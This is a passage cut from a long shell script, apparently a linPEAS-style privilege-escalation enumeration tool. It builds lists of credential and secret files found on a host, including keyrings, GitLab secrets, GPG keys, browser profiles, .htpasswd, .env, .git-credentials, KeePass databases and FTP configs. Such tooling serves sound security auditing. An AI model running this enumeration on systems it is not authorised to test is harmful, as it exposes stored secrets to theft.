"$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/lib' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E 'README.gnupg' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 
"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | 
grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 
"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 
"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 
